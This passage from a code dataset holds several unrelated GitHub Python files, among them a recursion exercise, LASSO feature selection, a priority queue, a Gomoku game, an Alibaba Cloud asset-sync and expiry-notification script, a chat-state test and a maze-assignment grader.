response.context['comments'])\n","repo_name":"alekswonder/Yatube","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"15530218595","text":"def fac(n):\n    if n==1:\n        return 1\n    else:\n        return n*fac(n-1)\n\n\nprint(fac(6))\n\n# Fibonacci sequence\ndef fib(n):\n    if n==1:\n        return 1\n    elif n==2:\n        return 1\n    else:\n        return fib(n-1)+fib(n-2)\n\n# the number at position 6 of the Fibonacci sequence\nprint(fib(6))\n\n# print the first six numbers of this sequence\nfor i in range(1,7):\n    print(fib(i))","repo_name":"weeinee/python-study","sub_path":"project/递归函数.py","file_name":"递归函数.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37787200501","text":"\"\"\"Feature selection.\n\n\"\"\"\n\n\n# import numba as nb\nimport numpy as np\nimport 
pandas as pd\nimport sklearn as skl\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import Lasso\nfrom unipy.stats.formula import from_formula\nfrom unipy.stats.metrics import vif\n\n\n__all__ = ['lasso_rank',\n 'feature_selection_vif']\n\n\n# Defining a Lasso generic function\ndef _lasso_for_loop(data, X=None, y=None, alpha=.0001, *args, **kwargs):\n\n # Fit to the model\n lassoReg = Lasso(alpha=alpha, fit_intercept=True,\n normalize=True, precompute=False,\n max_iter=1e5, tol=1e-7,\n warm_start=False, positive=False,\n selection='cyclic', *args, **kwargs)\n\n lassoReg.fit(data[X], data[y].squeeze())\n yPredict = lassoReg.predict(data[X])\n\n # Return the result in pre-defined format\n rss = np.sum((yPredict - data[y].squeeze()) ** 2)\n ret = [rss]\n ret.extend([lassoReg.intercept_])\n ret.extend(lassoReg.coef_)\n\n return ret, yPredict\n\n\ndef lasso_rank(formula=None, X=None, y=None, data=None,\n alpha=np.arange(1e-5, 1e-2, 1e-4), k=2, plot=False,\n *args, **kwargs):\n \"\"\"Feature selection by LASSO regression.\n\n Parameters\n ----------\n formula:\n R-style formula string\n\n X: list-like\n Column values for X.\n\n y: list-like\n A column value for y.\n\n data: pandas.DataFrame\n A DataFrame.\n\n alpha: Iterable\n An Iterable contains alpha values.\n k: int\n Threshold of coefficient matrix\n\n plot: Boolean (default: False)\n True if want to plot the result.\n\n Returns\n -------\n rankTbl: pandas.DataFrame\n Feature ranking by given ``k``.\n\n minIntercept: pandas.DataFrame\n The minimum intercept row in coefficient matrix.\n\n coefMatrix: pandas.DataFrame\n A coefficient matrix.\n\n kBest: pandas.DataFrame\n When Given ``k``, The best intercept row in coefficient matrix.\n\n kBestPredY: dict\n A predicted ``Y`` with ``kBest`` alpha.\n\n Example\n -------\n >>> import unipy.dataset.api as dm\n >>> dm.init()\n ['cars', 'anscombe', 'iris', 'nutrients', 'german_credit_scoring_fars2008', 'winequality_red', 'winequality_white', 'titanic', 'car90', 'diabetes', 'adult', 'tips', 'births_big', 'breast_cancer', 'air_quality', 'births_small']\n >>> wine_red = dm.load('winequality_red')\n Dataset : winequality_red\n >>>\n >>> ranked, best_by_intercept, coefTbl, kBest, kBestPred = lasso_rank(X=wine_red.columns.drop('quality'), y=['quality'], data=wine_red)\n >>> ranked\n rank lasso_coef abs_coef\n volatile_acidity 1 -0.675725 0.675725\n alcohol 2 0.194865 0.194865\n >>> best_by_intercept\n RSS Intercept fixed_acidity volatile_acidity \\\n alpha_0.00121 691.956364 3.134874 0.002374 -1.023793\n\n citric_acid residual_sugar chlorides free_sulfur_dioxide \\\n alpha_0.00121 0.0 0.0 -0.272912 -0.0\n\n total_sulfur_dioxide density pH sulphates alcohol \\\n alpha_0.00121 -0.000963 -0.0 -0.0 0.505956 0.264552\n\n var_count\n alpha_0.00121 6\n >>>\n \"\"\"\n if formula is not None:\n X, y = from_formula(formula)\n else:\n X = list(X)\n y = y\n\n # Iterate over the alpha values\n coefMatrix = {'alpha_%.5f' % a: _lasso_for_loop(data, X=X, y=y, alpha=a, *args, **kwargs)[0] for a in alpha}\n predict = {'alpha_%.5f' % a: _lasso_for_loop(data, X=X, y=y, alpha=a, *args, **kwargs)[1] for a in alpha}\n\n coefMatrix = pd.DataFrame(coefMatrix).T\n coefMatrix.columns = ['RSS', 'Intercept'] + X\n coefMatrix['var_count'] = coefMatrix.apply(np.count_nonzero, axis=1) - 2\n\n # Filter by thresh >= var_count\n kBest = coefMatrix[coefMatrix['var_count'] <= k]\n kBest = kBest.loc[kBest[['var_count']].idxmax()]\n kBest = kBest.loc[kBest[['Intercept']].idxmin()]\n\n # Minumum Intercept\n minIntercept = 
coefMatrix.loc[coefMatrix[['Intercept']].idxmin()]\n\n # Get Predicted Y value\n alphaVal = kBest.index[0]\n kBestPredY = {alphaVal: predict[alphaVal]}\n\n # Get a Rank Table\n lassoVal = kBest.iloc[:, kBest.squeeze().nonzero()[0].tolist()[2:-1]]\n filteredTbl = pd.concat([lassoVal.T, abs(lassoVal).T], axis=1)\n filteredTbl.columns = ['lasso_coef', 'abs_coef']\n filteredTbl = filteredTbl.sort_values(by='abs_coef', ascending=False)\n filteredTbl['rank'] = range(1, len(filteredTbl) + 1)\n rankTbl = filteredTbl[['rank', 'lasso_coef', 'abs_coef']]\n\n # Plots\n #fig = plt.figure(figsize=(12, 9))\n #title = 'Top {} variables : absolute coefficient by Lasso'.format(len(filteredTbl))\n #rankTbl['abs_coef'].plot(kind='barh')\n #fig.suptitle(title, fontsize=14, fontweight='bold')\n #plt.tight_layout(pad=5)\n\n return rankTbl, minIntercept, coefMatrix, kBest, kBestPredY\n\n\ndef feature_selection_vif(data, thresh=5.0):\n '''Stepwise Feature Selection for multivariate analysis.\n\n It calculates OLS regressions and the variance inflation factors iterating\n all explanatory variables. If the maximum VIF of a variable is over the\n given threshold, It will be dropped. This process is repeated until all\n VIFs are lower than the given threshold.\n\n Recommended threshold is lower than 5, because if VIF is greater than 5,\n then the explanatory variable selected is highly collinear with the other\n explanatory variables, and the parameter estimates will have large standard\n errors because of this.\n\n Parameters\n ----------\n data : DataFrame, (rows: observed values, columns: multivariate variables)\n design dataframe with all explanatory variables, as for example used in\n regression\n\n thresh : int, float\n A threshold of VIF\n\n Returns\n -------\n Filtered_data : DataFrame\n A subset of the input DataFame\n\n dropped_List : DataFrame\n 'var' column : dropped variable names from input data columns\n 'vif' column : variance inflation factor of dropped variables\n\n Notes\n -----\n This function does not save the auxiliary regression.\n\n See Also\n --------\n statsmodels.stats.outliers_influence.variance_inflation_factor\n\n References\n ----------\n http://en.wikipedia.org/wiki/Variance_inflation_factor\n\n '''\n assert isinstance(data, pd.DataFrame)\n\n # Create Dropped variable list\n dropped = pd.DataFrame(columns=['var', 'vif'])\n\n # Startswith 'drop = True'(Assume that some variables will be dropped)\n dropCondition = True\n\n # Calculate a VIF & Drop columns(variables)\n while dropCondition:\n\n # 1. Calculate a VIF\n vifDict = {col: vif(data.loc[:, col], data.loc[:, data.columns != col])\n for col in data.columns}\n\n # Get the MAXIMUM VIF\n maxVar = max(vifDict, key=vifDict.get)\n maxVal = vifDict[maxVar]\n\n # 2. 
IF VIF values are over the threshold, THEN drop it\n if maxVal >= thresh:\n\n # Keep it\n dropped = dropped.append({'var': maxVar, 'vif': maxVal},\n ignore_index=True)\n\n # Drop it\n data = data.drop(maxVar, axis=1)\n\n # Print it\n print(\"Dropping '\" + str(maxVar) + \"' \" + \" VIF: \" + str(maxVal))\n\n # Since a variable has been dropped, the assumption remains\n dropCondition = True\n\n else:\n\n # No variable dropped, the assumption has been rejected\n dropCondition = False\n\n # Print Massages\n remainsMsg = '# Remaining Variables '\n msgWrapper = '-' * (len(remainsMsg)+1)\n\n print('\\n' + msgWrapper + '\\n' + remainsMsg + '\\n' + msgWrapper)\n print(list(data.columns))\n print('\\n')\n\n droppedMsg = '# Dropped Variables '\n msgWrapper = '-' * (len(remainsMsg)+1)\n print('\\n' + msgWrapper + '\\n' + droppedMsg + '\\n' + msgWrapper)\n print(list(dropped.loc[:, 'var']))\n print('\\n')\n\n return data, dropped\n","repo_name":"pydemia/unipy","sub_path":"unipy/stats/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37689410932","text":"class PriorityQueue(object):\n def __init__(self):\n self._head = None\n self._tail = None\n self._count = 0\n \n def is_empty(self):\n return self._count == 0\n \n def __len__(self):\n return self._count\n \n def __str__(self):\n current_node = self._head\n string_list = []\n while current_node is not None:\n string_list.append(str((current_node.item, current_node.priority)))\n current_node = current_node.next\n return str(string_list)\n \n def enqueue(self, item, priority):\n new_entry = _PriorityQEntry(item, priority)\n if self.is_empty():\n self._head = new_entry\n else:\n self._tail.next = new_entry\n \n self._tail = new_entry \n self._count += 1\n \n def dequeue(self):\n assert not self.is_empty(), \"cannot pop from empty queue\"\n\n max_priority_entry = self._head\n pre_entry = None\n\n current_node = self._head\n pre_node = None\n while current_node is not None:\n if current_node.priority > max_priority_entry.priority:\n pre_entry = pre_node\n max_priority_entry = current_node\n \n pre_node = current_node\n current_node = current_node.next\n \n item = max_priority_entry.item\n \n if max_priority_entry == self._head:\n self._head = self._head.next\n else:\n pre_entry.next = max_priority_entry.next\n \n self._count -= 1\n \n return item\n \nclass _PriorityQEntry(object):\n def __init__(self, item, priority, link=None):\n self.item = item\n self.priority = priority\n self.next = link\n \n \ndef main():\n print(\"create new priority\")\n Q = PriorityQueue()\n print()\n \n print(\"add (1,2)\")\n Q.enqueue(1,2)\n \n print(\"add (3,5)\")\n Q.enqueue(3,5)\n \n print(\"add (6,1)\")\n Q.enqueue(6,1)\n \n print(\"add (2,4)\")\n Q.enqueue(2,4)\n \n print(\"add (0,2)\")\n Q.enqueue(0,2)\n \n print(\"add (125,2)\")\n Q.enqueue(125,2)\n \n print(\"add (325,2)\")\n Q.enqueue(325,2)\n \n print()\n \n print(\"Queue: \")\n print(Q)\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n \n print(\"dequeue: %d\"% Q.dequeue())\n print(Q)\n print()\n\n \nif __name__ == \"__main__\":\n main()\n \n \n \n \n \n \n \n \n \n \n 
","repo_name":"yuhanliu0121/learnDataStructure","sub_path":"Chapter8_Queue/5_priorityQueue_linkedlist.py","file_name":"5_priorityQueue_linkedlist.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15520206415","text":"from board import Board\nfrom player import Player\n\nclass Gomoku:\n\tdef __init__(self):\n\t\tself.player1 = Player(1)\n\t\tself.player2 = Player(2)\n\t\tself.board = Board()\n\n\t#self is object itself (in this case gomoku)\n\t#capitalize objects and classes\n\tdef play(self):\n\t\twhile True:\n\t\t\tturn_x = raw_input(\"Player 1 turn x: \")\t\n\t\t\tturn_y = raw_input(\"Player 1 turn y: \")\n\t\t\t\n\t\t\twhile not (self.player1.check_legal(self.board,int(turn_x),int(turn_y))):\n\t\t\t\tturn_x = raw_input(\"Player 1 turn x: \")\t\n\t\t\t\tturn_y = raw_input(\"Player 1 turn y: \")\n\t\t\tself.player1.move(self.board,int(turn_x),int(turn_y))\n\t\t\t\n\t\t\tif self.player1.win(self.board,int(turn_x),int(turn_y)):\n\t\t\t\tprint(\"Player 1 wins\")\n\t\t\t\treturn\n\t\t\t\n\t\t\tturn_x = raw_input(\"Player 2 turn x: \")\t\n\t\t\tturn_y = raw_input(\"Player 2 turn y: \")\n\n\t\t\twhile not (self.player2.check_legal(self.board,int(turn_x),int(turn_y))):\n\t\t\t\tturn_x = raw_input(\"Player 2 turn x: \")\t\n\t\t\t\tturn_y = raw_input(\"Player 2 turn y: \")\n\t\t\tself.player2.move(self.board,int(turn_x),int(turn_y))\n\t\t\t\n\t\t\tif self.player2.win(self.board,int(turn_x),int(turn_y)):\n\t\t\t\tprint(\"Player 2 wins\")\n\t\t\t\treturn\n\ngame = Gomoku()\ngame.play()\n\n","repo_name":"purriah/Gomoku","sub_path":"gomoku.py","file_name":"gomoku.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5901210117","text":"from alibabacloud_resourcemanager20200331.client import Client as ResourceManager20200331Client\nfrom alibabacloud_tea_openapi import models as open_api_models\nfrom alibabacloud_resourcemanager20200331 import models as resource_manager_20200331_models\nfrom alibabacloud_ecs20140526.client import Client as Ecs20140526Client\nfrom alibabacloud_ecs20140526 import models as ecs_20140526_models\nfrom Tea.exceptions import TeaException\nfrom alibabacloud_bssopenapi20171214.client import Client as BssOpenApi20171214Client\nfrom alibabacloud_bssopenapi20171214 import models as bss_open_api_20171214_models\nfrom alibabacloud_tea_util import models as util_models\nfrom alibabacloud_tea_util.client import Client as UtilClient\n\nimport sys,datetime,hashlib\nfrom units import consul_kv,consul_svc\nfrom units.cloud import sync_ecs\nfrom units.cloud import notify\n\ndef exp(account,collect_days,notify_days,notify_amount):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.utcnow().strftime('%Y-%m-%dT16:00:00Z')\n collect = (datetime.datetime.utcnow() + datetime.timedelta(days=collect_days+1)).strftime('%Y-%m-%dT16:00:00Z')\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'business.aliyuncs.com'\n client = BssOpenApi20171214Client(config)\n query_available_instances_request = bss_open_api_20171214_models.QueryAvailableInstancesRequest(\n renew_status='ManualRenewal',\n end_time_start=now,\n end_time_end=collect)\n runtime = util_models.RuntimeOptions()\n amount_response = client.query_account_balance()\n try:\n exp = client.query_available_instances_with_options(query_available_instances_request, runtime)\n 
exp_list = exp.body.to_map()['Data']['InstanceList']\n exp_dict = {}\n isnotify_list = consul_kv.get_keys_list(f'ConsulManager/exp/isnotify/alicloud/{account}')\n isnotify_list = [i.split('/')[-1] for i in isnotify_list]\n notify_dict = {}\n amount_dict = {}\n for i in exp_list:\n notify_id = hashlib.md5(str(i).encode(encoding='UTF-8')).hexdigest()\n endtime = datetime.datetime.strptime(i['EndTime'],'%Y-%m-%dT%H:%M:%SZ') + datetime.timedelta(hours=8)\n endtime_str = endtime.strftime('%Y-%m-%d')\n iname = consul_svc.get_sid(i['InstanceID'])['instance']['Meta']['name'] if i['ProductCode'] == 'ecs' else 'Null'\n exp_dict[i['InstanceID']] = {'Region':i.get('Region','Null'),'Product':i['ProductCode'],\n 'Name':iname,'EndTime':endtime_str,'notify_id':notify_id,\n 'Ptype':i.get('ProductType',i['ProductCode'])}\n if (endtime - datetime.datetime.now()).days < notify_days and notify_id not in isnotify_list:\n notify_dict[i['InstanceID']] = exp_dict[i['InstanceID']]\n consul_kv.put_kv(f'ConsulManager/exp/lists/alicloud/{account}/exp', exp_dict)\n amount = float(amount_response.body.data.available_amount.replace(',',''))\n consul_kv.put_kv(f'ConsulManager/exp/lists/alicloud/{account}/amount',{'amount':amount})\n if amount < notify_amount:\n amount_dict = {'amount':amount}\n exp_config = consul_kv.get_value('ConsulManager/exp/config')\n wecomwh = exp_config.get('wecomwh','')\n dingdingwh = exp_config.get('dingdingwh','')\n feishuwh = exp_config.get('feishuwh','')\n if notify_dict != {}:\n msg = [f'### 阿里云账号 {account}:\\n### 以下资源到期日小于 {notify_days} 天:']\n for k,v in notify_dict.items():\n iname = k if v['Name'] == 'Null' else v['Name']\n msg.append(f\"- {v['Region']}:{v['Product']}:{iname}:{v['EndTime']}\")\n content = '\\n'.join(msg)\n if exp_config['switch'] and exp_config.get('wecom',False):\n notify.wecom(wecomwh,content)\n if exp_config['switch'] and exp_config.get('dingding',False):\n notify.dingding(dingdingwh,content)\n if exp_config['switch'] and exp_config.get('feishu',False):\n title = '阿里云资源到期通知'\n md = content\n notify.feishu(feishuwh,title,md)\n if amount_dict != {}:\n content = f'### 阿里云账号 {account}:\\n### 可用余额:{amount} 元'\n if exp_config['switch'] and exp_config.get('wecom',False):\n notify.wecom(wecomwh,content)\n if exp_config['switch'] and exp_config.get('dingding',False):\n notify.dingding(dingdingwh,content)\n if exp_config['switch'] and exp_config.get('feishu',False):\n title = '阿里云余额不足通知'\n md = content\n notify.feishu(feishuwh,title,md)\n\n except Exception as error:\n UtilClient.assert_as_string(error.message)\n\ndef group(account):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.now().strftime('%m%d/%H:%M')\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'resourcemanager.aliyuncs.com'\n client = ResourceManager20200331Client(config)\n list_resource_groups_request = resource_manager_20200331_models.ListResourceGroupsRequest(page_size=100)\n try:\n proj = client.list_resource_groups(list_resource_groups_request)\n proj_list = proj.body.resource_groups.to_map()['ResourceGroup']\n group_dict = {i['Id']:i['DisplayName'] for i in proj_list}\n consul_kv.put_kv(f'ConsulManager/assets/alicloud/group/{account}',group_dict)\n count = len(group_dict)\n data = {'count':count,'update':now,'status':20000,'msg':f'同步资源组成功!总数:{count}'}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n print('【JOB】===>', 'alicloud_group', account, data, flush=True)\n except TeaException as e:\n emsg = 
e.message.split('. ',1)[0]\n print(\"【code:】\",e.code,\"\\n【message:】\",emsg, flush=True)\n data = consul_kv.get_value(f'ConsulManager/record/jobs/alicloud/{account}/group')\n if data == {}:\n data = {'count':'无','update':f'失败{e.code}','status':50000,'msg':emsg}\n else:\n data['update'] = f'失败{e.code}'\n data['msg'] = emsg\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n except Exception as e:\n data = {'count':'无','update':f'失败','status':50000,'msg':str(e)}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/group', data)\n\ndef ecs(account,region):\n ak,sk = consul_kv.get_aksk('alicloud',account)\n now = datetime.datetime.now().strftime('%m%d/%H:%M')\n group_dict = consul_kv.get_value(f'ConsulManager/assets/alicloud/group/{account}')\n\n config = open_api_models.Config(access_key_id=ak,access_key_secret=sk)\n config.endpoint = f'ecs.{region}.aliyuncs.com'\n client = Ecs20140526Client(config)\n\n next_token = '0'\n ecs_dict = {}\n try:\n while next_token != '':\n describe_instances_request = ecs_20140526_models.DescribeInstancesRequest(\n max_results=100,\n region_id=region,\n next_token=next_token\n )\n ecs = client.describe_instances(describe_instances_request)\n ecs_list = ecs.body.instances.to_map()['Instance']\n ecs_dict_temp = {i['InstanceId']:{\n 'name':i['InstanceName'],'group':group_dict.get(i['ResourceGroupId'],'无'),'ostype':i['OSType'].lower(),\n 'status':i['Status'],'region':region,\n 'ip':i[\"InnerIpAddress\"][\"IpAddress\"] if len(i[\"InnerIpAddress\"][\"IpAddress\"]) != 0 else i['NetworkInterfaces']['NetworkInterface'][0]['PrimaryIpAddress'],\n 'cpu':f\"{i['Cpu']}核\",'mem':f\"{str(round(i['Memory']/1024,1)).rstrip('.0')}GB\",'exp':i['ExpiredTime'].split('T')[0],'ecstag': i.get('Tags',{}).get('Tag',[])\n }for i in ecs_list}\n ecs_dict.update(ecs_dict_temp)\n next_token = ecs.body.next_token\n\n count = len(ecs_dict)\n off,on = sync_ecs.w2consul('alicloud',account,region,ecs_dict)\n data = {'count':count,'update':now,'status':20000,'on':on,'off':off,'msg':f'ECS同步成功!总数:{count},开机:{on},关机:{off}'}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n print('【JOB】===>', 'alicloud_ecs', account,region, data, flush=True)\n except TeaException as e:\n emsg = e.message.split('. 
',1)[0]\n print(\"【code:】\",e.code,\"\\n【message:】\",emsg, flush=True)\n data = consul_kv.get_value(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}')\n if data == {}:\n data = {'count':'无','update':f'失败{e.code}','status':50000,'msg':emsg}\n else:\n data['update'] = f'失败{e.code}'\n data['msg'] = emsg\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n except Exception as e:\n data = {'count':'无','update':f'失败','status':50000,'msg':str(e)}\n consul_kv.put_kv(f'ConsulManager/record/jobs/alicloud/{account}/ecs/{region}', data)\n","repo_name":"xugaopeng1/ConsulManager","sub_path":"flask-consul/units/cloud/alicloud.py","file_name":"alicloud.py","file_ext":"py","file_size_in_byte":9340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14450406717","text":"\n\"\"\"\nTest that s with a chat state notification but no body don't create a\nnew text channel.\n\"\"\"\n\nfrom twisted.words.xish import domish\n\nfrom gabbletest import exec_test\nimport constants as cs\nimport ns\n\ndef test(q, bus, conn, stream):\n # message without body\n m = domish.Element((None, 'message'))\n m['from'] = 'alice@foo.com'\n m['type'] = 'chat'\n m.addElement((ns.CHAT_STATES, 'composing'))\n stream.send(m)\n\n # message with body\n m = domish.Element((None, 'message'))\n m['from'] = 'bob@foo.com'\n m['type'] = 'chat'\n m.addElement((ns.CHAT_STATES, 'active'))\n m.addElement('body', content='hello')\n stream.send(m)\n\n # first message should be from Bob, not Alice\n event = q.expect('dbus-signal', signal='NewChannel')\n assert event.args[1] == cs.CHANNEL_TYPE_TEXT\n jid = conn.InspectHandles(cs.HT_CONTACT, [event.args[3]])[0]\n assert jid == 'bob@foo.com'\n\nif __name__ == '__main__':\n exec_test(test)\n","repo_name":"jku/telepathy-gabble","sub_path":"tests/twisted/text/test-text-no-body.py","file_name":"test-text-no-body.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6922161955","text":"t = int(input())\nfor i in range(t):\n pw = []\n dummy = []\n log = input()\n # 커서를 기준으로 두 스택을 이용하여 처리\n # 문자일때는 왼쪽 스택에 삽입\n # < 일때는 왼쪽에서 오른쪽으로 삽입\n # > 일때는 오른쪽에서 왼쪽으로 삽입\n for char in log:\n if char =='<' :\n if pw:\n dummy.append(pw.pop())\n elif char =='>':\n if dummy:\n pw.append(dummy.pop())\n elif char =='-':\n pw.pop()\n else:\n pw.append(char)\n pw.extend(reversed(dummy))\n print(''.join(pw))\n\n\ntest_cases = int(input())\n\n","repo_name":"wjddn3711/algorithm","sub_path":"basic/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12827093936","text":"import platform\nimport os\nimport shutil\n\nmap_count = 18\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n###\n# Helpers for all tasks\n###\n\n\ndef print_map(map):\n for row in map:\n print(f'{row}\\n')\n\n\ndef compare_maps(soln_map, stu_map):\n # Compare current stu_path with current soln_path\n for i, soln_row in enumerate(soln_map):\n if soln_row != stu_map[i]:\n return False\n\n return True\n\n\ndef validate_map(m, steps=None, path=None):\n print_map(m)\n if steps is not None:\n print(f'Steps: {steps}')\n if path is not None:\n print(f'Path: {path}')\n\n ans = input(\"Is this map valid? 
[y/Y/n/N] \")\n\n while True:\n if ans == \"y\" or ans == \"n\":\n break\n ans = input(\"Please enter y/Y/n/N \")\n\n return True if ans.lower() == \"y\" else False\n\n###\n# Task A: check that input and map match\n###\n\n\ndef taskA(solution, answer):\n # Get our solution's map, without outer walls\n soln_map = []\n if(solution.readline().rstrip() == \"--- Task 1 ---\"):\n line = solution.readline().rstrip()\n while line != \"--- Task 2 ---\":\n soln_map.append(line)\n line = solution.readline().rstrip()\n\n # Get the student's map\n stu_map = []\n if(answer.readline().rstrip() == \"--- Task 1 ---\"):\n line = answer.readline().rstrip()\n while line != \"--- Task 2 ---\":\n stu_map.append(line)\n line = answer.readline().rstrip()\n\n # Check if they're the same\n correct_rows = 0\n for i, row in enumerate(soln_map):\n if(row == stu_map[i]):\n correct_rows += 1\n else:\n print(f'{bcolors.FAIL} Row {i} is incorrect! {bcolors.ENDC}')\n print(f'\\tExpected:\\n\\t{row}\\n\\tGot:\\n\\t{stu_map[i]}\\n')\n\n if(correct_rows == 11):\n # Full marks\n a_mark = 10\n colour = bcolors.OKGREEN\n elif(correct_rows > 0):\n # Maximum mark of 8\n a_mark = correct_rows * 2\n if(correct_rows > 8):\n a_mark = 8\n colour = bcolors.WARNING\n else:\n # Hardcoded or just incorrect map\n a_mark = 0\n colour = bcolors.FAIL\n\n print(f'{colour} Task A: {a_mark}/10 {bcolors.ENDC}')\n\n###\n# Task B: check all paths are provided\n###\n\n\ndef get_paths(f):\n first_path = True\n paths = []\n line = f.readline().rstrip()\n while line != \"--- Task 3 ---\":\n # New path has started\n if \"--- Path\" in line:\n if first_path == True:\n # Ignore the first \"--- Path\" we encounter - path will be []\n first_path = False\n else:\n paths.append(path)\n\n path = []\n else:\n path.append(line)\n\n line = f.readline().rstrip()\n paths.append(path) # Append final path\n return paths\n\n\ndef remove_duplicate_paths(paths):\n # Just remove duplicates manually\n new_paths = []\n for path in paths:\n if path not in new_paths:\n new_paths.append(path)\n\n return new_paths\n\n\ndef taskB(solution, answer):\n #! 
Note: this removes duplicate shortest paths from the students answer\n\n # Get all the shortest paths printed out in the solution\n soln_paths = get_paths(solution)\n\n # Get all the shortest paths printed out in the student answer\n stu_paths = get_paths(answer)\n\n # Remove duplicate paths in stu_paths\n stu_paths = remove_duplicate_paths(stu_paths)\n\n # Find the correct paths (in RIP time complexity)\n actual_correct_paths = len(soln_paths)\n correct_paths = 0\n for i, soln_path in enumerate(soln_paths):\n match_found = False\n\n # Find the same path in stu_paths, if it exists\n for stu_path in stu_paths:\n if compare_maps(soln_path, stu_path) == True:\n stu_paths.remove(stu_path)\n match_found = True\n break\n\n if match_found == True:\n correct_paths += 1\n else:\n print(\n f'{bcolors.FAIL} Could not find solution path {i+1} in student paths {bcolors.ENDC}')\n\n # If there are leftover paths - deal with this manually\n # All paths here are not the shortest, but you may be able to get marks anyway\n valid_paths = 0\n if len(stu_paths) != 0:\n print(\n f'{len(stu_paths)} paths in the student answer are either invalid or not the shortest path')\n\n for path in stu_paths:\n if validate_map(path):\n valid_paths += 1\n\n # Calculate the mark for this phase\n if correct_paths == actual_correct_paths:\n # Full marks\n b_mark = 50\n colour = bcolors.OKGREEN\n elif correct_paths > 0 or valid_paths > 0:\n # Partial marks\n b_mark = 0\n\n # +20 for the first shortest path, +4 for every shortest path after that\n first_path = True\n for i in range(correct_paths):\n b_mark += 20 if first_path else 4\n first_path = False\n\n # +10 for the first valid path, +2 for every one after that\n first_path = True\n for i in range(valid_paths):\n b_mark += 10 if first_path else 2\n first_path = False\n\n # Maximum marks obtainable is 40\n if(b_mark > 40):\n b_mark = 40\n\n colour = bcolors.WARNING\n else:\n # No marks\n b_mark = 0\n colour = bcolors.FAIL\n\n print(f'{colour} Task B: {b_mark}/50 {bcolors.ENDC}')\n\n\n###\n# Task C: check the least turns path is valid\n###\n\n\ndef get_paths_and_steps(f):\n paths = []\n m = []\n line = f.readline().rstrip()\n\n while line != \"--- Task 4 ---\":\n if \"Path: \" in line:\n path = line.replace(\"Path: \", \"\")\n paths.append({\n \"map\": m,\n \"path\": path,\n \"steps\": steps,\n })\n m = []\n elif \"Steps: \" in line:\n steps = line.replace(\"Steps: \", \"\")\n else:\n m.append(line)\n\n line = f.readline().rstrip()\n\n return paths\n\n\ndef taskC(solution, answer):\n # Get all possible maps, paths and steps from the solution\n soln_paths = get_paths_and_steps(solution)\n\n # Get the least turns map from the student answer\n stu_paths = get_paths_and_steps(answer)\n\n if len(stu_paths) == 0:\n # No attempt made\n print(f'{bcolors.FAIL} Task C: 0/50 {bcolors.ENDC}')\n return\n\n stu_map = stu_paths[0][\"map\"]\n stu_steps = stu_paths[0][\"steps\"]\n stu_path = stu_paths[0][\"path\"]\n c_mark = 0\n\n for i in soln_paths:\n soln_map = i[\"map\"]\n soln_steps = i[\"steps\"]\n soln_path = i[\"path\"]\n\n # Found a matching maze!\n if compare_maps(soln_map, stu_map):\n # Double check the path and steps are the same as well\n if soln_steps == stu_steps:\n if soln_path == stu_path:\n # Everything is correct!\n c_mark += 30\n else:\n print(\n f'{bcolors.FAIL} Wrong path. Got {stu_path}. 
Expected {soln_path} {bcolors.ENDC}')\n # +5% for every 3 correct steps (consecutive)\n for s_index, s in enumerate(stu_path):\n if s == soln_path[s_index]:\n if s_index % 3 == 0:\n c_mark += 5\n else:\n break\n c_mark = 15 if c_mark > 15 else c_mark\n else:\n # +10 for finding a shortest path with least turns\n print(\n f'{bcolors.FAIL} Wrong number of steps. Got {stu_steps}. Expected {soln_steps} {bcolors.ENDC}')\n c_mark += 10\n\n # No match found - manually check if it is correct\n if c_mark == 0:\n print(\n f'Least turns path in the student answer is either invalid or not the shortest path')\n print(f'For reference, expecting {soln_steps} turns in the path')\n if validate_map(stu_map, steps=stu_steps, path=stu_path):\n c_mark += 20\n\n colour = bcolors.OKGREEN if c_mark == 30 else bcolors.WARNING\n colour = bcolors.FAIL if c_mark == 0 else colour\n\n print(f'{colour} Task C: {c_mark}/30 {bcolors.ENDC}')\n\n\n###\n# Task D: given the absolute path of the file, check if the path is correct\n###\n\ndef taskD(answer, m):\n f = answer.readline().rstrip()\n path = answer.readline().rstrip()\n\n if \"File: \" not in f or \"Path: \" not in path:\n d_mark 